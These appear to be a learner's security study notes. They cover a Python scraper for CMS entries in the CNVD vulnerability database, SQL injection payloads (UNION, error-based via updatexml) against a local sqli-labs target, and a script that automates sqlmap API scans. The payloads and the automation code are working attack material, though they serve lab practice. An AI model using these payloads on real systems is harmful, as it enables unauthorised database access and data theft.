Fetch the site's vulnerability list, filtered for CMS


Open Burp Suite


Open the page to crawl (the CMS search-results page)


Turn on Intercept and reload the page


Click through a few "next page" links and watch the requests in Burp Suite


The captured POST request looks like this:

    POST /flaw/list.htm?flag=true HTTP/1.1
    Host: www.cnvd.org.cn
    Connection: close
    Content-Length: 385
    Cache-Control: max-age=0
    Origin: https://www.cnvd.org.cn
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946

    number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset=
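As a quick sketch, the same search request can be rebuilt with the `requests` library. Only the parameters that matter for the search are kept here; everything else (including the anti-bot cookies, which expire quickly) is omitted, so treat this as illustrative, not a drop-in replacement for the captured request:

```python
# Sketch: rebuild the CNVD search POST with requests (trimmed parameter set).
import requests

url = "https://www.cnvd.org.cn/flaw/list.htm?flag=true"
data = {
    "keyword": "CMS",   # the search term
    "condition": "1",
    "flag": "true",
    "max": "20",        # results per page
    "offset": "0",      # 0, 20, 40, ... selects the page
}
headers = {
    "User-Agent": "Mozilla/5.0",
    "Referer": url,
}

# Build (but do not send) the request, to inspect the urlencoded body.
req = requests.Request("POST", url, data=data, headers=headers).prepare()
print(req.body)
# resp = requests.Session().send(req)  # would actually send it (needs valid cookies)
```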

Inspect the page source to find a pattern


Use a regular expression to match the href attribute of the <a> tags

Fetch the full vulnerability list on the first page,
then loop to fetch the first six pages (offset 0 to 100 in steps of 20)

    # -*-coding:utf-8-*-
    import hackhttp
    from bs4 import BeautifulSoup as BS
    import re


    def CMS(raw):
        url = 'https://www.cnvd.org.cn/flaw/list.htm?flag=true'
        hh = hackhttp.hackhttp()
        code, head, html, redirect_url, log = hh.http(url=url, raw=raw)
        soup = BS(html, 'lxml')
        # every entry in the list is an <a> tag whose href starts with /flaw/show/CNVD-
        BUGS = soup.find_all(name='a', attrs={'href': re.compile('/flaw/show/CNVD-')})
        for BUG in BUGS:
            print BUG['title']


    raw_start = '''POST /flaw/list.htm?flag=true HTTP/1.1
    Host: www.cnvd.org.cn
    Connection: close
    Content-Length: 385
    Cache-Control: max-age=0
    Origin: https://www.cnvd.org.cn
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: https://www.cnvd.org.cn/flaw/list.htm?flag=true
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: __jsluid_s=291f680c5a289ecb36b0880aaa5c03a5; __jsl_clearance=1564385854.189|0|qzmx5icNGuu8jWYRCjUcsZGZwtA%3D; JSESSIONID=CDDB992CDCCB4252C0C80D3D60784946

    number=%E8%AF%B7%E8%BE%93%E5%85%A5%E7%B2%BE%E7%A1%AE%E7%BC%96%E5%8F%B7&startDate=&endDate=&field=&order=&flag=true&keyword=CMS&condition=1&keywordFlag=0&cnvdId=&cnvdIdFlag=0&baseinfoBeanbeginTime=&baseinfoBeanendTime=&baseinfoBeanFlag=0&refenceInfo=&referenceScope=-1&manufacturerId=-1&categoryId=-1&editionId=-1&causeIdStr=&threadIdStr=&serverityIdStr=&positionIdStr=&max=20&offset='''

    for pages_count in range(0, 101, 20):  # offset = 0, 20, ..., 100: six pages of 20 entries
        raw = raw_start + str(pages_count)
        CMS(raw)

SQL injection: worked examples

SQL injection

Numeric injection:

    1 or 1=1 -- 1
    1 or 1=1 #

String injection:

    1' or 1=1 -- 1
    1' or 1=1 #

UNION-based injection:

1. Determine the number of columns with a UNION query:

        select id,username from users union select 1,2;

2. Get the current database name and version:

        select id,username from users union select database(),version();

3. Use the TABLES table of the built-in information_schema database to list all table names of a given database:

        select id,username from users where id=-1 union select TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security';

4. Use the COLUMNS table of information_schema to list the column names of a given table:

        select id,username from users where id=-1 union select TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users';

5. Dump the data from the target table:

        select id,username from users where id=-1 union select id,username from users;

The same steps, as URLs against the test target. Get table info:

    http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,TABLE_SCHEMA from information_schema.TABLES where TABLE_SCHEMA='security' limit 3,1; -- 1

Get column info:

    http://127.0.0.1/sqli/Less-2/?id=100 union select 1,TABLE_NAME,COLUMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security' and TABLE_NAME='users' limit 0,1; -- 1

Get table data:

    http://127.0.0.1/sqli/Less-2/?id=100 union select id,username,password from users; -- 1

Error-based injection (updatexml):

    and updatexml(1,version(),0)#

Show the full version string:

    and updatexml(1,concat(0x7e,version()),0)

Get a table name. Without a limit clause this fails, because the subquery returns more than one row:

    and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)
    ERROR 1242 (21000): Subquery returns more than 1 row

So fetch table names one at a time:

    and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0)

Get column names:

    and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),0)#

Get the data:

    and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#
    and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#

For more, see the SQL-injection wargame document.
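To see why the numeric payload dumps every row, here is a minimal sketch using Python's built-in sqlite3 with a deliberately vulnerable, string-concatenated query (the table and rows are made up for the demo):

```python
# Demo: why "1 or 1=1" returns every row when input is concatenated into SQL.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [(1, "admin"), (2, "alice"), (3, "bob")])

def vulnerable_lookup(user_input):
    # BAD: user input concatenated straight into the statement
    sql = "SELECT id, username FROM users WHERE id = " + user_input
    return conn.execute(sql).fetchall()

print(vulnerable_lookup("2"))         # only the matching row
print(vulnerable_lookup("1 or 1=1"))  # the WHERE clause is always true: all rows
```

The fix is the same in any database: pass user input as a bound parameter (`?` placeholder) instead of concatenating it into the statement.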

sql注入.pdf

A deep dive into the SQLMAP API

geturl.py

    #coding=utf-8
    from bs4 import BeautifulSoup
    import hackhttp

    # 1. define the url, request it and get the html back
    url = "http://192.168.131.149/sqli/"
    hh = hackhttp.hackhttp()
    code, head, html, redirect_url, log = hh.http(url)
    # 2. parse the html with the lxml parser
    soup = BeautifulSoup(html, "lxml")
    content = soup.find_all('map', id='fm_imagemap')  # the image map that holds the level links
    print content
    # 3. walk every <area> in the parsed page and build a test url for each level
    for k in soup.find_all('area'):
        print(url + k['href'] + '?id=1')  # append a probe parameter to each link
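The `<area href>` extraction can be checked offline against a literal HTML snippet; the snippet below is invented to mirror the shape of the sqli index page, so only the extraction logic is being demonstrated:

```python
# Offline check of the <area href> extraction used in geturl.py.
from bs4 import BeautifulSoup

html = """
<map id="fm_imagemap">
  <area href="Less-1/">
  <area href="Less-2/">
</map>
"""
base = "http://192.168.131.149/sqli/"
soup = BeautifulSoup(html, "html.parser")
targets = [base + a["href"] + "?id=1" for a in soup.find_all("area")]
print(targets)
```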

autosqli.py

    #coding=utf-8
    import json
    import time

    import requests

    logo = "======auto sqli tools======"
    print(logo)

    def sqlmap(host):
        urlnew = "http://127.0.0.1:8775/task/new"
        urlscan = "http://127.0.0.1:8775/scan/"
        headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36"}
        # create a new task
        pd = requests.get(url=urlnew, headers=headers)
        print('[*]New task')
        # read the taskid out of the returned json
        jsons = pd.json()
        print("[*]id:", jsons['taskid'])
        print("[*]success:", jsons["success"])
        id = jsons['taskid']
        # build the scan-start url from the taskid and post the target url
        scan = urlscan + id + "/start"
        print("[*]scanurl:", scan)
        data = json.dumps({"url": "{}".format(host)})
        headerss = {"Content-Type": "application/json"}
        # ask the sqlmapapi server to start the scan
        scans = requests.post(url=scan, headers=headerss, data=data)
        # confirm the scan started
        swq = scans.json()
        print('--------scan-----------')
        print('[*]scanid:', swq["engineid"])
        print('[*]scansuccess:', swq["success"])
        print('--------status---------')
        status = "http://127.0.0.1:8775/scan/{}/status".format(id)
        print(status)
        # poll until the scan finishes
        while True:
            ret = requests.get(url=status, headers=headers)
            # status == 'terminated' means the scan is done
            if ret.json()['status'] == 'terminated':
                # fetch the scan results
                datas = requests.get(url='http://127.0.0.1:8775/scan/{}/data'.format(id))
                dat = datas.json()['data']
                print('[*]data:', dat)
                break
            elif ret.json()['status'] == 'running':
                time.sleep(3)  # wait a bit instead of hammering the api

    sqlmap("http://192.168.131.149/sqli/Less-1/?id=1")
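The task lifecycle in the script (new task → start scan → poll status → fetch data) can be exercised offline by swapping the HTTP calls for stubs. The JSON shapes mirror what the script reads from sqlmapapi's `/scan/<id>/status` and `/scan/<id>/data` endpoints; the stub values themselves are made up:

```python
# Offline sketch of the polling loop in autosqli.py, with stubs in place of
# the requests calls against http://127.0.0.1:8775.
def wait_for_scan(poll_status, get_data):
    """Poll until the scan reports 'terminated', then fetch its data."""
    while True:
        if poll_status()["status"] == "terminated":
            return get_data()["data"]

# stub: two "running" polls, then the scan terminates
_states = iter([{"status": "running"},
                {"status": "running"},
                {"status": "terminated"}])
result = wait_for_scan(lambda: next(_states),
                       lambda: {"data": [{"title": "boolean-based blind"}]})
print(result)
```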

https://www.freebuf.com/articles/web/204875.html
深入了解SQLMAP API.pdf

Related commands:

    python sqlmapapi.py -s    # start the sqlmapapi REST server (defaults to 127.0.0.1:8775)
    python sqlmapapi.py -c    # start the interactive api client